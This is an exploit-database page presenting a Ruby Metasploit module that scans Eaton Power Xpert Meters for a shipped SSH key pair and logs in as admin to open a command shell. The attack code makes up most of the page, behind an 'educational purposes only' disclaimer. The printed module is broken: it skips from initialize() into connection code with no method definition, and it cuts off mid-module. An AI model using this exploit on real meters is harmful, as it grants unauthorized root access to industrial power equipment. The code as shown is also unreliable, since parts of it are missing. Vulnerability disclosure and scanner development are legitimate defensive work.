Exploits / Vulnerability Discovered : 2018-08-29 |
Type : remote |
Platform : hardware
This exploit / vulnerability Eaton xpert meter 13.4.0.10 ssh private key disclosure is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Eaton Xpert Meter 13.4.0.10 - SSH Private Key Disclosure
# Date: 2018-07-16
# WebPage: https://CTRLu.net/
# Vendor Homepage: http://www.eaton.com/
# Vendor Advisory: http://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/PXM-Advisory.pdf
# Software Link: http://www.eaton.com/Eaton/ProductsServices/Electrical/ProductsandServices/PowerQualityandMonitoring/PowerandEnergyMeters/PowerXpertMeter400060008000/index.htm#tabs-2
# Version: Firmware <= 12.x and <= 13.3.x.x and below more versions may be impacted
# Recomended to update to Version 13.4.0.10 or above
# Tested on: Firmware 12.1.9.1 and 13.3.2.10
# CVE : N/A
# XXX: This shouldn't be necessary but is now
require 'net/ssh/command_stream'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::SSH
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::CommandShell
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Eaton Xpert Meter SSH Private Key Exposure Scanner',
'Description' => %q{
Eaton Power Xpert Meters are used across industries for energy management,
monitoring circuit loading, and identifying power quality problems.
Meters running firmware 12.x.x.x or below version 13.3.x.x and below ship with
a public/private key pair on Power Xpert Meter hardware that allows
passwordless authentication to any other affected Power Xpert Meter.
The vendor recommends updating to Version 13.4.0.10 or above. As the key is
easily retrievable, an attacker can use it to gain unauthorized remote
access as uid0
},
'Author' => [
'BrianWGray'
],
'References' => [
['URL', 'http://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/PXM-Advisory.pdf'],
['URL', 'https://www.ctrlu.net/vuln/0006.html']
],
'DisclosureDate' => 'Jul 18 2018',
'License' => MSF_LICENSE
))
ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
begin
ssh = Timeout.timeout(datastore['SSH_TIMEOUT']) do
Net::SSH.start(ip, 'admin', ssh_opts)
end
rescue Net::SSH::Exception => e
vprint_error("#{ip}:#{rport} - #{e.class}: #{e.message}")
return
end
return unless ssh
print_good("#{ip}:#{rport} - Logged in as admin")
version = ssh.transport.server_version.version
report_vuln(
host: ip,
name: self.name,
refs: self.references,
info: version
)
shell = Net::SSH::CommandStream.new(ssh)
return unless shell
info = "Eaton Xpert Meter SSH Backdoor (#{version})"